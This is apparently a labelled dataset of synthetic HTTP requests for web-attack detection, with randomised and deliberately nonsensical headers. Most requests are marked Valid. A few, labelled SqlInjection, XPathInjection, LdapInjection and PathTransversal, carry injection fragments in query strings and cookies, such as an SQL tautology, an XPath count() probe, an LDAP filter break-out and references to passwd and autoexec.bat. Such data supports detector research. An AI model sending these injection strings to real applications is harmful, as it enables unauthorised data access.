User-Agent: Mozilla/3.5 (Machintosh; U; PPC 9.4; ee-di; rv:0.5.6) Gecko/61137578
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1597x0250
Via: FTP/4.2 248.243.144.48, 9.6 www.s2iqvct.html:360
Transfer-Encoding: gzip
Upgrade: aev/1.5, 3me/3.4, 5bni/1.4, int/8.3
Warning: 346 www.sfYor.jpg "sc7si" 
X-Forwarded-For: 133.197.157.12
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11191
Start - Id: 14474
class: Valid
GET /cjL0PdivG.pl?pinnleo=%25positionr&nbn=h%408z%401vKR8_I&i8ty4=%3As&aofcerpr0=7300606459&hlemnezlnag=tp&lhsw1eciitcxr=stl&gnal=irwneqaooO&0syX=%2Blg%5Ba HTTP/1.1
Host: www.lrgeitoN.cz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-greek
Accept-Encoding: *;q=0.8
Accept-Language: l0u7yett-ar;q=0.6
Cache-Control: min-fresh=983
Client-ip: 186.140.111.152
Cookie: Nd7Oh@x=854066
Cookie2: $Version="86"
Date: Sat, 03 Feb 07 22:57:04 CET
ETag: "f66MDt5-FhVArWAl-ffw"
Expect: y9si=crLcm0u8;tdhtKic
From: utt4e4@eaLhafx.uk
If-Modified-Since: Sat, 21 Jul 07 09:58:32 UTC
If-Unmodified-Since: Fri, 20 Feb 04 13:26:48 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 09 Aug 05 07:55:54 CET
Max-Forwards: 5
MIME-Version: 5.4
Pragma: niVsS=ew
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: haTrEt 6itupsrO=rqrrn0
Range: 063-,416644-557318
Referer: /tsEnv8oz/4Eail/Tsgdoeoe.txt
TE: trailers
Trailer: Referer
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 9.6; oa-ln; rv:3.6.3) Gecko/53186221
UA-CPU: 68000
UA-Disp: 927,088,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 505x6087
Via: fErt/1.0 10.8.22.162, FTP/5.2 www.6nredn.shtml
Transfer-Encoding: compress
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 57.244.86.38
X-Serial-Number: 309851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14474
Start - Id: 9915
class: Valid
GET /tnehdnM/12/tn4a4ttlmt7u5erni/ecfd-Sr_r5j/KUJKDYh/jzz62odt/m4hare5HmdI3wo48t2wt/tltIWC/ong/mqUlrrsabtusrR15ie.jsp? HTTP/1.0
Host: 79.69.50.160
Connection: keep-alive
Accept: application/*;q=0.6
Accept-Charset: iso-8859-3
Accept-Encoding: compress;q=0.1, compress;q=0.4
Accept-Language: *;q=0.4
Cache-Control: rp='xtai'
Client-ip: 51.120.24.26
Cookie: rRhA4chd=etasoa ) teias<eusrDt;ds3ifosht=6;htsa7A=xewgdDr'hi2objectkL;faaee=80370092;puMimaeqoecqifp=178111267
Cookie2: $Version="503"
Date: Sat, 09 Oct 04 05:44:21 CET
ETag: "Gnh5nWnu7dc3KLCnHJ"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Mon, 05 Jun 06 05:40:34 UTC
If-Unmodified-Since: Wed, 13 Oct 04 08:13:22 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 4.6
Pragma: tnce='ons6'
Proxy-Authorization: Basic YzFvNmhldG46dW5uNmxkdDY=
Authorization: yeea kcdmiae=oid2ijBa
Range: -997,-1,-76458
Referer: /touhsDe/oAheHasn/mnee7sts/abrrNBe.php4
TE: trailers,trailers,deflate;q=0.0
Trailer: Range
User-Agent: twtam/5.3.3.8
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 496x973
Via: HTTP/7.8 www.otc42.jpeg, FTP/1.4 www.ttrlilh.gif, 1.0 215.205.173.141
Transfer-Encoding: deflate
Upgrade: eeTeSO/6.3, 4nyt/9.4
Warning: 613 www.7lzecv.tiff "SviossieRoa" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 15113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9915
Start - Id: 35426
class: SqlInjection
GET /fromghFd/uNreND.jpg?asc2wpb8ratEb=0594115&iidz8es4xaat=OR++++90%3E16857032723&sfteieia=ran&hnjloyp5i5Og=2166&CvsHznph-xmlas8=066005&sihefp=u7RGkSOrzXV&iyelsixtabAmrls=mS7%40cB&FbN0zperl=slni+&l0ifdnyia=39748428&nlot=%2Bsr%3Bie1tede&0@88JtelnetFR0A=hew&nd7LlsffnlDdnrd=u3aEtoetnhsdLvU&v1cfQb=nvP&i4fotb=lgnbZloenkOsbbk&QyB_J5Cstdina3positionT=sWSyg HTTP/1.0
Host: www.turmieq.biz
Connection: stzdo
Accept: application/*, image/jpeg
Accept-Charset: gb2312, windows-1251, x-mac-chinesesimp, utf-8;q=0.6, iso-8859-2;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: m-oy
Cache-Control: no-store
Client-ip: 185.9.17.112
Cookie: eleenitbg=ue
Date: Wed, 01 Oct 08 13:19:55 CET
ETag: "xs@3tPvr8T.jKwZ7M6C"
Expect: 100-continue
If-Modified-Since: Tue, 03 Jun 08 13:02:12 CET
If-Unmodified-Since: Wed, 14 Jan 09 04:44:55 CET
If-Match: "D2IWcd4pDLsjIT9g8"
If-None-Match: "6414UPycTaOr9QTdR"
If-Range: "r@1bfIIiOX1_k1qKLf"
Max-Forwards: 4331
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWllYWFub2lSc3Nyc21VbnJwYWVtZWNudWF1dU56MW90d3BvbGhhdWNh
Authorization: Digest opaque="nmlaq"
Range: 1117-95,491-
Referer: /OHssdin9.fgf
Trailer: TE
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 1.0; 0f-qd; rv:5.2.1) Gecko/91678094
UA-OS: Linux
UA-Pixels: 4231x7309
Via: HTTP/6.7 www.7ebIuytw.html:7, 7.8 214.92.155.217
Transfer-Encoding: bNg9
Upgrade: a1uoii/9.3, 2Nnr06/6.4
Warning: 213 www.ha181.png "anao" "Fri, 28 Dec 07 24:10:22 UTC"
X-Forwarded-For: 115.143.230.10
X-Serial-Number: 323144017545
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35426
Start - Id: 48752
class: XPathInjection
GET /o5EeaLrcm9vsri/8fwmlOXgslwue/n5TpfW6QQg0i/nrea0eyIm/oLRXT18w-H/pnl2eyb39horehe7e/eJtc/vc.png?jelatras=uxmlx%25u%26&FHIbgsoundps5hU=tTdfaevalwhereaerhaoobject%3Fod%27+&iodeo2esttfe=ehel1stvl&U1mocharG=emSso%27+++or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28i+%2B+j+++%2B+k%2B+++l++%2B+1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++%27eelE%27++%3D%27+HeiageD%27+or&Rrcp0iO=nodeahmochab%3B&Yhas=98&OV=bjoc4p&isExkcibrd=herneo7lmiu HTTP/1.1
Host: 122.176.175.24
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-icelandic;q=0.9, x-mac-chinesesimp, isiri-3342;q=0.6
Accept-Encoding: 
Accept-Language: Efslr-Eoo;q=0.8, Zmme8sm-teo, Slcbi-baea;q=0.1, n-Upgtw;q=0.9
Cache-Control: no-transform
Client-ip: 37.213.163.205
Cookie: 3YOhupdatesqarLZ=ee texrlSOoHvd;trGr0stdp=eid1
Cookie2: $Version="094"
Date: Fri, 13 May 05 22:03:10 UTC
ETag: W/"UE8zeFk_uitRh5X7DiJ-"
Expect: 100-continue
From: 2thchRa@mEq7atat.cz
If-Modified-Since: Mon, 17 Jul 06 04:05:22 GMT
If-Unmodified-Since: Thu, 14 Dec 06 11:25:06 UTC
If-Match: "Hyiqgn3PGzTYdNnBFh"
If-None-Match: *
If-Range: Thu, 29 Jan 04 16:38:25 UTC
Max-Forwards: 0
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: r8Rsio ieetco=c7xjd
Authorization: Digest nonce
Range: -506333,18704-151605
Referer: /Byrett/erseln/O2trTyc/1ltllnd/dEgn.exe
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Range
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 3.6; iq-et; rv:2.0.5) Gecko/29892859
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: ntl/9.4 www.4T1g3erb.htm, FTP/0.0 www.tiRJcs.jpg
Transfer-Encoding: compress
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 303 90.249.48.25 "nehmlsj3aoo" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48752
Start - Id: 19670
class: Valid
GET /labexmp/eOye/VNB/s7bgotmhDn3a.js?otse1dMl=81215&3iQ-WJkaS=142787 HTTP/1.1
Host: 170.6.87.102
Connection: close
Accept: text/plain, application/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate
Accept-Language: lfieit0-Wtc, issxf5oe-2oye, t-Urp, uettAi6k-bdirs;q=0.5
Cache-Control: min-fresh=8
Client-ip: 73.92.189.99
Cookie: aoos=504;pwczlizapg=616;rlelhRlelto=pi;Pr=01509;af=hYetu;vobjectb2xGmG=8
Cookie2: $Version="73"
Date: Mon, 09 Mar 09 15:36:51 UTC
ETag: W/"-qsLuv-EiEwuhFBn4MD"
Expect: 100-continue
From: oaaup@byaL.biz
If-Modified-Since: Thu, 13 Jan 05 12:42:09 GMT
If-Unmodified-Since: Sat, 07 Nov 09 03:22:43 UTC
If-Match: "hRK034LO6gdaRPtJ53k"
If-None-Match: *
If-Range: Mon, 12 Dec 05 09:54:30 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: wncf sZiI=mapeesi
Authorization: Digest qop=1jrlm
Range: -616446,-952232,-327
Referer: http://cadseep.net/5ah3eChy.asmx
TE: trailers
Trailer: Via
User-Agent: dCME95M8 http://www.xlsrma.uk
UA-CPU: StrongARM
UA-Disp: 4810,493,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 106x833
Via: FTP/5.7 www.1ncneasa.jpeg, 2.0 24.21.38.200, HTTP/6.8 162.211.48.153
Transfer-Encoding: deflate
Upgrade: oalaa/7.0, rhnhe/1.6, nkog/3.3
Warning: 720 202.193.20.146 "vzausimaegtuyuinei" "Mon, 07 Jul 08 14:32:11 UTC"
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 7592797493312
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19670
Start - Id: 12409
class: Valid
GET /ohyznmgwhaz/UQp/vzCusrUoQvF5/ayOqhptikesetiada3/t42huYkM-8-W.bin?aidsaeroaft=v%28sl&sduyedhlebouzi=eOan&raoetahineeotCe=p%27tmpw&zX6irsta=ny&droHta=Nuebhwywyn&ntidDisK=tnlxtetUnxl8O&3Gqvi=996319&lr32i=utmd&biegtedsreeoel=2 HTTP/1.0
Host: 174.132.215.167
Connection: lchiae
Accept: audio/basic;q=0.8, video/*;q=0.8, application/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: I-eosSuad;q=0.1
Cache-Control: max-age=729
Client-ip: 7.28.246.54
Cookie: mi=63197;7lq=2
Cookie2: $Version="74"
Date: Sun, 18 Apr 04 09:22:25 GMT
ETag: W/"bwj.1qI6pKy-i7GX"
Expect: 100-continue
From: yiBv9i@mndhmfHee.st
If-Modified-Since: Mon, 18 Jan 10 13:02:14 CET
If-Unmodified-Since: Mon, 22 Aug 05 10:07:29 GMT
If-Match: *
If-None-Match: "h@eurGYW2EATWRWj"
If-Range: Tue, 02 Oct 07 18:27:48 CET
Max-Forwards: 5
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: feoulm Ptecse1=aOIsge
Authorization: trdrbt Hsoieg=atcttn3
Range: -119886,3059-
Referer: /fe7ahahh.jsp
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/2.5 (Windows; U; Win98 9.1; ei-Re; rv:8.3.8) Gecko/28612283
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7091x4892
Via: hbdss/6.2 113.9.156.247:77425
Transfer-Encoding: 4r33u
Upgrade: neuch/5.4
Warning: 287 176.2.7.94 "enesescISnojte" 
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 41667021783349598958
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12409
Start - Id: 23517
class: Valid
GET /o4Wk1_Jnv0TNVSKY/d0nloFeoritEqeup/ni/no3g6WN.cgi?Ht5e73ens1A6=TjiTEdmaohuaEm&et=nzr&usr9homeiframeAFIYtz=oE2ahnsssoian&6enh2n7=Hbodyei%28ti4ugEr%26e&XzJEclogG=dpj&ztaehna=924&sfTta7rtcint8u=Ilb+etcnplhttpodtiscripthsocsh&tebfonleqkSas=ttsuuueazpeareu&K4jKOP5=ofrom+nc%28connectwal&orivpyMtEj2ote=nlfrxdlossbee&d7eloobtsxidj=tyeouresoAesTtolb&nfreetimAbhon=0494524 HTTP/1.0
Host: www.er5f.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 252.115.46.155
Cookie: eppki0ffblyV=tmpihne;_WLJ=9it1;execPJ.=152701523;bxolmRToi=psobd8tgmthtaccestMsqW;Otorr3odtiwi=2875110;hfunnzr=31461433
Cookie2: $Version="0"
Date: Fri, 21 Apr 06 02:01:21 UTC
ETag: W/"NYxcBqjIFCeg3fhWJ"
Expect: s4Ffghrl
From: iedsurn@koroi.net
If-Modified-Since: Thu, 30 Oct 08 22:40:11 UTC
If-Unmodified-Since: Wed, 27 Jan 10 17:15:32 CET
If-Match: *
If-None-Match: *
If-Range: "fnCrViKzhCMBzfZi"
Max-Forwards: 851
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic VHJzRDZtZTpzN2xldGl3cg==
Authorization: cPbhq zyeohapt=reasi0oe
Range: 90-,49-617
Referer: http://twom.ch/nisl/n105/ehlccrns/PexBwoe.exe
TE: gzip;q=0.2
Trailer: Trailer
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 8.0; Ir-9l; rv:4.8.7) Gecko/95380354
UA-CPU: PowerPC
UA-Disp: 987,566,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4426x0282
Via: 4.2 252.85.51.22, HTTP/2.1 www.fst6hpli.tiff
Transfer-Encoding: dpuai
Upgrade: a3n6/8.7, lsh/8.8, wnbftt/2.7, eeGa/8.4, whoete/1.4
Warning: 316 www.deemx.htm:8305 "btsydnansow" 
X-Forwarded-For: 238.108.237.191
X-Serial-Number: 467341
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23517
Start - Id: 38312
class: LdapInjection
GET /jRp5ygmitusa9/8P6echoxTsock_stream/JAEhsgl/dKktQICxB@X-fxfk-/ylob/1EgJ/helOmuuune3otel/m4nIYU5eJ1m/0ceem1xmeopateugen/ic7/oinatota.png?wbAena0si7nEsi=rhcjneNimndbeaRh&hsKie=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&6e=uoeot%3C6xp_l%24-%5Dncdr&optTP22E=htanrlaiwrwosjlrcd&im5rthlfhtn=4ILHlBwH27&maTutsofmheia5=T7nr7naoie&9DI.2eox_replaceEd=873970552&YT.ybUqC4Sz=ifVZD&scet=ahaermawlsB6i&yHfg6=66746949&e9vd=ltcow HTTP/1.1
Host: www.haoc.biz:85401
Connection: keep-alive
Accept: video/*;q=0.4, video/*
Accept-Charset: iso-8859-1, iso-8859-8;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: Shorom6i-r, ogcd-Eaoes;q=0.6
Cache-Control: no-store
Client-ip: 2.55.18.28
Cookie: cayeeeauEh=daxs;rsnrnsa0Lhnps9=siearsboolmteFgbp;olsde9Psiel=eOTT_Y
Cookie2: $Version="14"
Date: Tue, 17 Feb 04 10:44:44 GMT
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: A5rn=vo3il;oawRs
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Sat, 02 Jul 05 24:42:34 GMT
If-Unmodified-Since: Thu, 20 Mar 08 19:44:56 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Oct 08 16:00:50 CET
Max-Forwards: 429
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: et9ei fHAiir=otnroeir
Range: 529307-,-0
Referer: http://nntnd.ch/sa0t4/oatwd.jpg
TE: gzip,deflate,trailers
Trailer: Pragma
User-Agent: aaloA5ar (rLZPpnXv6)
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/4.5 138.49.2.137, FTP/8.3 www.gyhsieir.shtml, 1.1 239.183.221.127
Transfer-Encoding: identity
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38312
Start - Id: 2688
class: Valid
GET /6gYT5KhlOl_EqAsuPP4/m8q@5ax5MOGQiYx4/m.GWLncIXCdF6d_98h/ovexbuog2/tpvntwwha3r.jpeg?memeuFAanelD=nSa&OYe=hp2d&nlt8s=Hetpg3tato HTTP/1.1
Host: www.plhtc.gov:80
Connection: close
Accept: text/html
Accept-Charset: x-mac-roman;q=0.1
Accept-Encoding: *
Accept-Language: uk5lt3-eauisne;q=0.5, mmFcz-t, aeuecae-ws1ujn;q=0.0
Cache-Control: no-store
Client-ip: 136.27.86.187
Cookie: olinkye6h.uAvN=dihctwDsaui0ev;wnmsmr=4203
Cookie2: $Version="843"
Date: Mon, 18 Apr 05 15:20:26 UTC
ETag: "Ep-BnL.Dav3cl1dOgeB"
Expect: 100-continue
From: 7gysst2@lttfiqa.de
If-Modified-Since: Sun, 20 Apr 08 05:58:14 CET
If-Unmodified-Since: Tue, 31 Jul 07 10:02:08 UTC
If-Match: *
If-None-Match: "glf_W-uzn6_d0qwqc2zT"
If-Range: Tue, 20 Jul 04 12:37:05 GMT
Max-Forwards: 5913
MIME-Version: 6.0
Pragma: layejtet=mr
Proxy-Authorization: Basic MUVsdDoxb3NlY29mZQ==
Authorization: ia1te iedsnnc=reslehog
Range: -49
Referer: /rsddca.mpeg
TE: trailers,deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.9 (X11; U; SunOS sun4u 7.4; rr-za; rv:1.3.5) Gecko/75553600
UA-CPU: 68000
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 486x934
Via: 6.1 202.12.59.15, 9.6 4.92.56.43, epdy/2.7 www.ysuotef.jpg
Transfer-Encoding: deflate
Upgrade: azkuh/4.3, ztter/5.6, EyResi/1.5, vTvy/8.8
Warning: 219 122.35.37.173 "2adtsiylpah6Tny" "Sun, 23 Oct 05 22:41:41 GMT"
X-Forwarded-For: 67.16.171.178
X-Serial-Number: 8136074594585
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2688
Start - Id: 33856
class: Valid
PUT /tT0t6V.SEJfn/n5c.mspx? HTTP/1.1
Content-Length: 52
Content-Language: o,tynfpl,esom
Content-Encoding: compress
Content-Location: /Lzcoji/olnkcutv/5B9einnc/etdbd.ace
Content-MD5: dXNlU29iV3VhdG5hZ3N0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Oct 08 05:22:49 GMT
Last-Modified: Tue, 02 Mar 10 23:48:53 GMT
Host: 51.206.205.37
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp;q=0.1, koi8;q=0.9, iso-8859-2, iso-8859-15;q=0.1
Accept-Encoding: compress;q=0.3, compress;q=0.6, gzip;q=0.1, deflate, deflate
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 158.160.107.116
Cookie: Eai04ep=5;0ueEEwstos4Uzr= oia)teopen
Cookie2: $Version="264"
Date: Thu, 28 May 09 08:29:38 UTC
ETag: W/"COp0UgeCb27E23yDy"
Expect: iIe36c
From: tdove@2rii.it
If-Modified-Since: Tue, 07 Nov 06 11:43:58 CET
If-Unmodified-Since: Sat, 15 Oct 05 09:53:23 CET
If-Match: *
If-None-Match: "Bvu4t70EDRUes4bVrvre"
If-Range: Fri, 06 Jun 08 17:48:48 UTC
Max-Forwards: 1656
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: dtotg hnese=thdmar
Authorization: Digest cnonce="ruyntdk"
Range: 8190-,7682-
Referer: http://www.54n9d.st/yhhdxo/qnros/oaadint/rtenns.gz
TE: deflate;q=0.4,chunked;q=0.1
Trailer: If-Range
User-Agent: dr84R6 http://www.dnb6yLe.fr
UA-CPU: 68000
UA-Disp: 3260,0446,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1982x002
Via: HTTP/3.1 191.109.106.14:436, 7.3 110.29.129.108
Transfer-Encoding: identity
Upgrade: cheaq/9.6, loIi/0.0
Warning: 343 www.suiglbE.html "pthnTtNjlbncxd" "Fri, 09 Sep 05 11:27:25 CET"
X-Forwarded-For: 36.38.198.62
X-Serial-Number: 562812126143349
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EI5-H3fE=22118856&eV38ts6tsawne=iPQNFRLonj&Feo7u=593

End - Id: 33856
Start - Id: 45343
class: PathTransversal
GET /at0ciho/pcJTLTWpasswdMkTMiah/4n/xd9ieuH9eeirmdxoi41h/nPmzbRG99p9uxlH/i9oe/locationpn/eBhvPi0LHN1ZCVQs/tgijen2tbeaats3Ir/lV6ys8i9yT2.php3?tsn=78633&nt=ifden&WUlike1gRG4=41&oaze4h=518084&88j@NNrIFSw=gS6h&thaeoLnnN=960534984&pnyt5=046&ea0gj=7ac&2d9s4CimgYjH=oievlw&2ipNCEr=+%27u&Mbcwtifarlaa=wdocumente&dzStidauuq=3&iscamAur=se3ttuo&eeeEleeo8chioe=55935931 HTTP/1.1
Host: www.ecahia.uk:8378
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.2, gzip, deflate
Accept-Language: *
Cache-Control: max-age=1
Cookie: aool=npen1do;mtneosamnohkl=\autoexec.bat;iysD5eMa=47431976;dsni6iIst3nwit=fr6erDnusferao1hls;lsiV5nhViaty=77382
Date: Thu, 22 May 08 24:50:40 GMT
From: as1tah0@dwEehob.it
If-Unmodified-Since: Fri, 11 Dec 09 16:33:12 CET
If-Match: "7mo7B0u5zONGZMo"
Max-Forwards: 17
MIME-Version: 3.3
Pragma: gecin=drr
Proxy-Authorization: ttiWga ek8e=ohYg
Referer: http://www.mnttaes.st/mlebaraE/el01/Cyjte/Gvoeka/nyzlT.sh
Trailer: TE
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 5.4; su-yl; rv:2.5.3) Gecko/32869742
UA-OS: Windows 98
UA-Pixels: 8431x403
----: ----------------------------------

null

End - Id: 45343
Start - Id: 24623
class: Valid
GET /olaadnspeso/toj/jyccjlmMLl6JmmSj2KU/xiyrge/1xs3XA/5CM/7_3childWLkxp_https/edrH4e0a/S33A00dB.P/ep5ztaezkeaP7renst7e/1aneuD.gif? HTTP/1.1
Host: 161.123.7.22
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-hebrew
Accept-Encoding: *;q=0.8
Accept-Language: tu-tnT, ate-5kBh;q=0.5, snenm3-un, maaexe-cIes9, 1utet4G-b
Cache-Control: max-stale
Client-ip: 153.210.163.65
Cookie: erdli=hrA 
Cookie2: $Version="89"
Date: Thu, 17 Feb 05 11:53:56 GMT
ETag: W/"gxM-KAWB7.0f.MAhdFV"
Expect: 100-continue
From: utgowu@dmbui.org
If-Modified-Since: Sun, 26 Mar 06 15:00:04 UTC
If-Unmodified-Since: Tue, 18 Sep 07 24:27:23 GMT
If-Match: *
If-None-Match: "H1ndKPx9L-iP0ml1"
If-Range: "8ZvR9iJ6Msb25zM"
Max-Forwards: 8507
MIME-Version: 1.4
Pragma: qsme=Sja
Proxy-Authorization: srtD dntn=ngrhegia
Authorization: Basic NjBvZG5lYzpyb2luT2g=
Range: -633614,846-,145-
Referer: /dj4a/enrjtohi.doc
TE: gzip;q=0.0,gzip
Trailer: Via
User-Agent: kdRdyrfved (rQqh9LM; makTPGg)
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4560x959
Via: 3.5 www.sHEeleo.css, 4.7 www.sNrlkt4.png
Transfer-Encoding: compress
Upgrade: ondn/6.1, Ahoius/9.4, hirtoh/1.0, e4wha/6.9
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24623
Start - Id: 10566
class: Valid
GET /dFwBIZx/PowmK1vDSTXfperlboot.iniT/luK/n.Tcb2riQxkN/uW9I3eUQFH34q/i548K-w/f75eQ2Sack16fP6Zb8/almsuIKZb0/lttflanucE9/E5E2JIz/alWl/shdP3va.exe?er=5901 HTTP/1.0
Host: 223.214.164.225:80
Connection: close
Accept: text/plain, text/*;q=0.6, text/html
Accept-Charset: iso-8859-9, windows-1255, iso-8859-5, cp-950;q=0.4
Accept-Encoding: *
Accept-Language: Bhp-6c;q=0.5, Nc-so3
Cache-Control: no-cache
Client-ip: 130.227.3.39
Cookie: svanepwktt8u=ei4anr4;kacceptFxLiframeCQW=0;tmfja=n10k;epIoozhehoathS=oBE;wKs7A=ule;zItG-g.=siN
Cookie2: $Version="60"
Date: Tue, 17 Feb 09 07:40:53 UTC
ETag: "srx.L70Oq_daGQJ9Sr"
Expect: 100-continue
From: lienea@fkubr8mmw0.cz
If-Modified-Since: Wed, 28 Feb 07 05:43:51 GMT
If-Unmodified-Since: Tue, 27 Apr 10 16:40:10 UTC
If-Match: *
If-None-Match: "jX5mLLf-nlNifQPjIi"
If-Range: "0ZBjrW1OByFGNv2CwF"
Max-Forwards: 30
MIME-Version: 6.8
Pragma: a1teqrsm=ko2ei
Proxy-Authorization: Basic b2hlOHVudDpsenR2ZA==
Authorization: NTLM bGVvYXRhdGlydHVpdGVlbXBoTW9mZmRvZWxlbmllamk4T3R0bw==
Range: 18-1555
Referer: /ibehee.php4
TE: chunked;q=0.3
Trailer: Date
User-Agent: Sbsoiah/1.3.0.6.1
UA-CPU: Sparc
UA-Disp: 942,3967,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2627x335
Via: FTP/6.6 www.l1coosqn.html:67, HTTP/2.4 166.14.61.216
Transfer-Encoding: compress
Upgrade: uietn/2.4
Warning: 945 244.191.10.199 "Pealdat" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 72395720
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10566
Start - Id: 516
class: Valid
GET /kmeblhtl4Uc/71ZAchdeopcsHjlc/fiiqx_u/oljBc6V6df7PLINt1hI/eDS80aO@o5UpkC6iS/reP8cc4G9mi4YLDgv/be/yfY0LmFDhqX7uC0.swf?hrea7y5tCcer6s=rrmxfY&1dt=lT36F&F8eUBorlfsI=eosjYnadjinl6&yntbgaioacy=ePM40-mItKT&hnitmTtcurew11u=71004142&ehef8tg0pz=a%7ClD%26tmpopteSdria4&huwrrzzagg4dh=so2Ine%7Ccvbscriptila HTTP/1.0
Host: 171.32.82.72
Connection: keep-alive
Accept: text/xml;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 133.168.110.42
Cookie: r7c=63;qesswO=gsFmkg;aotnItrncx=9092872;ht=h9Haastl
Cookie2: $Version="487"
Date: Thu, 11 Oct 07 19:45:44 UTC
ETag: W/"qmPRCaGmEOHB-JKz273d"
Expect: aorh
From: Csuh@ese7nna.be
If-Modified-Since: Thu, 07 Sep 06 06:35:23 CET
If-Unmodified-Since: Sun, 25 Apr 04 12:36:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 23 Jan 10 08:30:33 GMT
Max-Forwards: 01
MIME-Version: 0.3
Pragma: ekis='Oosndmi'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic Y2V3c2liY2M6dGFwbm4=
